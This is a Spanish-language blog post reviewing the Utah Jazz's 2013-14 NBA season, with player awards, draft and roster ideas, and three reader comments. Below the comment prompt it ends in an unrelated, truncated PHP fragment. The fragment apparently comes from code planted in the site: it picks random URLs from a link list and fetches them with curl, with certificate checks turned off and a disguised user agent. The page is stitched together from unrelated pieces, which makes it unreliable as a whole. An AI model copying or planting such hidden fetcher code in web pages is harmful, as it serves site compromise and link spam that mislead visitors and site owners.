Utah Jazz: Insuficiente

18 de June de 2014 por TheDeerHunter

Suspenso pero meritoria campaña de los Jazz. Este curso, más que nunca, es justo reconocer que han jugado con toda la dignidad del mundo dentro de sus posibilidades. En una conferencia durísima pocos les hubieran podido reprochar 5 o 6 victorias menos con su consiguiente puñado de papeletas adicionales. Ya señalamos en su día lo bien que les hubiera venido una de las perlas de la presente edición del draft. Hubiera sido la guinda a una reconstrucción bastante bien llevada como la suya. No obstante, tampoco podemos obviar que han acabado con el peor balance del Oeste, con un 30% de victorias. Conviene recordar que durante las últimas tres décadas de la franquicia no alcanzar los playoffs ha sido prácticamente pecado mortal.

Para muestra de la seriedad con la que se han tomado la campaña tan pronto como acabó anunciaron la salida de Tyrone Corbin. Sorprende un poco pues el hombre no disponía de una plantilla para darse demasiadas alegrías. Advertimos que era corta y que cualquier lesión de los titulares podría resultar crítica. Así se vio en el complicado inicio que disputaron sin Trey Burke pero a su vuelta el equipo llegó a resultar competitivo durante tres meses e incluso se situaron temporalmente por delante de los Lakers en la clasificación, aunque un pésimo final y la falta de progreso claro en la mayor parte de facetas de juego agotó la confianza de la directiva en el técnico. 

Individualmente la campaña ha resultado la mar de interesante en cuanto al desempeño de la joven columna vertebral. Desayunaron con una temprana renovación de Derrick Favors por 49 millones en 4 temporadas y el hombre ha respondido razonablemente bien, con bastante margen de progreso. Si acaso han surgido algunas dudas acerca de su compatibilidad con la otra perla interior, Enes Kanter, un problema que para sí quisieran muchos y que aún no es concluyente. Se ha observado un progreso significativo en Alec Burks y en Gordon Hayward, así como una mayor presencia de Jeremy Evans. Cabe destacar la madurez alcanzada por el segundo, quien además, ha asumido responsabilidades en la dirección durante muchos momentos. Sin embargo, su eficacia anotadora ha caído este año de forma preocupante. Finalmente uno de los grandes aciertos del curso fue la elección de Trey Burke, quien se ha desenvuelto como todo un veterano manejando las riendas del equipo.

Se hace obligatorio destacar la labor de dos “currantes” como Marvin Williams y Richard Jefferson. Confieso que era particularmente crítico con la presencia de Jefferson pero a pesar de lo que parecen indicar sus números su labor ha sido incalculable, tanto por su aportación concreta en la pista como por su ejemplo de profesionalidad para sus compañeros. En Utah han estado abiertamente encantados a pesar del alto coste económico.

Los Jazz deben de ir ultimando la reconstrucción. Salt Lake City nunca ha sido un mercado atractivo y a falta de concretar sus elecciones de primera ronda tampoco cuentan con base suficiente para captar la atención de los mejores agentes libres de la próxima offseason. Tienen una importante flexibilidad salarial pero difícilmente le podrán sacar provecho este verano. Su futuro a corto plazo seguirá estando en manos de los jóvenes pero es fundamental que comiencen a mostrar mejores resultados para tratar de subir el escalón de competitividad que les falta al verano siguiente, en el que podrían optar a fichar una superestrella.

PREMIOS

MVP: A priori el hombre más importante de la plantilla es Derrick Favors y todo ha girado alrededor suyo a pesar de que no ha terminado de explotar ni ofensivamente, ni como el monstruo defensivo que todo indica que va a ser. Veremos qué faceta termina desarrollando antes. Por su parte Gordon Hayward ha terminado siendo el jugador más utilizado como chico para todoy ha liderado la tabla de anotadores en un equipo donde cuesta horrores encontrar aro.

Rookie: Sus números, vistos fríamente, no han sido nada del otro jueves y debe de mejorar imperiosamente su producción anotadora. Sin embargo Trey Burke ha demostrado que, como los buenos bases, hace mejores a sus compañeros. Fue tímidamente considerado en las quinielas por el RoY por su impacto inicial en el balance de su equipo.

Sorpresa: En nuestro análisis inicial mostrábamos una confianza casi ciega en sus posibilidades, e incluso nuestro compañero se atrevía a señalar su potencial como 6º hombre. Todo un alarde de visión, pues el papel de Alec Burks no había pasado de discreto en sus anteriores campañas. Ha duplicado su presencia y producción respecto a ellas.

Decepción: Ponemos fuera de concurso a Andris Biedrins, que parece mentira que sea el mismo jugador que promediaba dobles-dobles en los Warriors hace un lustro. Ha cobrado 9 millones por 6 partidos. No está nada mal el jornal aunque se le acaba el chollo. Nos duele algo más el rendimiento de Brandon Rush a quien las lesiones nunca han dejado ser el jugador que apuntaba. También termina contrato y no será fácil que alguien apueste por él. Por último, Rudy Gobert, del que en el blog alguno auguraba grandes cosas, apenas ha rascado bola este año.

Esfuerzo en vano: Cobrando 11 millones no se cumple con la definición más precisa de “en vano”. La producción de Richard Jefferson, evidentemente, no ha estado a la altura de esas cifras, como tampoco del jugador all-star que algún día fue. Sin embargo su rendimiento ha sido similar al de sus campañas en San Antonio donde era imprescindible para Popovich. Para Corbin también lo ha sido. En Utah están especialmente contentos de su labor con los jóvenes y con su rol de especialista defensivo, aunque no tiene ni remotamente garantizada su renovación.

JUGANDO A GM

Los despachos tienen trabajo por hacer pues únicamente cuentan con 7 jugadores con contrato garantizado para el próximo curso, excluyendo los futuros rookies. Al menos pronto se cerró la contratación del nuevo técnico con Quin Snyder que ya debe de estar trabajando en la confección de la plantilla para el  año próximo.

El foco de atención más inmediato es la noche del draft, donde eligen en 5ª y 23ª posición. Necesitarían fundamentalmente un alero pero difícilmente Wiggins y Parker estarán disponibles. En cambio suena con mucha fuerza Dante Exum en el pick más alto. Tiene sentido, pues resulta imperioso reforzar una posición tan crítica como la de base liberando así a Hayward. Le daría una variante táctica interesante a Burke e incluso se afirma que son compatibles, considerando a Exum combo-guard. Si les volara éste aún tendrían la posibilidad de optar por Smart, aunque también podrían alterar el espíritu de la elección yendo a por un cuatro como Vonleh, Gordon o Randle. Hay quien opina que habría overbooking interior, aunque no es así si se tiene a Favors y Kanter como centers puros y en tal caso se podría plantear la salida del segundo. Para la 23 dejaríamos la captación del tres. KJ McDaniels es un atlético alero que aportaría defensa inmediata y algunos le señalan como uno de los posibles tapados. Kyle Anderson o Cleanthony Early también suenan.

Gordon Hayward es agente libre restringido. La intención de los Jazz debería de ser retenerle, aunque seguramente saldrán algunas novias que complicarán la operación. A no ser que sean ofertas desorbitadas habría que hacer el esfuerzo de igualarlas. Cuentan con margen salarial de sobra para ello.

Entre Jefferson, Biedrins, Marvin Williams y Rush suman 32 millones en expirings. No parece haber intención de afrontar sus renovaciones. Podrían plantearse las de Jefferson y Williams de ser significativamente a la baja. La reducción de sus aspiraciones se da por descontada pero no se espera que llegue a tanto como para que les interese a los Jazz, especialmente en términos de duración. Conviene no comprometer salario en este tipo de contratos. Otros hombres como Diante Garrett, Malcom Thomas, Mike Harris, Ian Clark o Erik Murphy no han convencido y probablemente tampoco renovarán.

Así las cosas deberían acudir al mercado para captar un tirador y un interior. No creemos que vayan a apostar fuerte por alguien tipo Lance Stephenson, sino que buscarán perfiles mucho más discretos. Anthony Tolliver y Jodie Meeks podrían valer.

Esta podría ser la plantilla con la que los Jazz afrontarán la 2014-15 y convencer a un gran agente libre de que les lidere devolviendo a la franquicia a donde le corresponde.

PG: Trey Burke, Dante Exum, John Lucas III
SG: Alec Burks, Jodie Meeks
SF: Gordon Hayward, KJ McDaniels
PF: Derrick Favors, Jeremy Evans, Anthony Tolliver
C: Enes Kanter, Rudy Gobert

Comenta

3 comentarios a esta entrada

  1. Denise dice:
    #1

    jaja Deer, que chistoso. Sé que lo haces para provocarme, ¿como osas poner como decepción a Rudy Gobert? Si no le han dado minutos!!!. La decepción es que no le metiese un gancho en la boca al merluzo de Corbin,
    El francés cada vez que ha salido ha demostrado un poder de intimidación brutal pese a estar muy verde aún y debe haber sido uno de los jugadores con mayor productividad por minutos de toda la liga.

    En el Draft elegiría claramente a Randle, monto una buena pareja en la zona junto a Favors, y como confío en la explosión de Gobert, el turco Kanter me sobra, por lo que lo traspaso a OKC por Reggie Jackson, Jeremy Lamb y pick 21.

      Citar

  2. Esteban dice:
    #2

    yo renuevo a los 5 jovenes que tienen y si logro fichar a jabari parker, que me paren!!!!

      Citar

  3. Viva_Dirk dice:
    #3

    Hombre Denise, ahora entiendo algunas ofertas que recibí en la hoops. Que droga debería tomar el GM de Oklahoma para dar a Reggie Jackson, Jeremy Lamb y el pick 21 por un jugador que no ha demostrado absolutamente nada.

    Lo que hecho en falta en el análisis de Deer es si piensa que no van a gastar nada de dinero, por ejemplo podría fichar a Deng directo de la FA, quizá con un contrato no excesivamente largo, y usar a Hayward de SG. Y si fuera ellos me la jugaría con Stephenson sin duda alguna, con Burke y Hayward que son jugadores con alto IQ y que les falta instinto anotador fichas a Stephenson que si algo tiene es instinto. Coincido plenamente en que KJ McDaniels les iría de perlas.

    Burke-Stephenson-Hayward-Randle-Favors sería un gran quinteto, con Burks, McDaniels y Evans en el banco. Si que intentaría sacar algo por Kanter si se pone a tiro, algo que me de un par de piezas para el banco, Calderon+Carter por ejemplo, como incluso incluyendo en el pack a Hayward para ir a por Melo.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>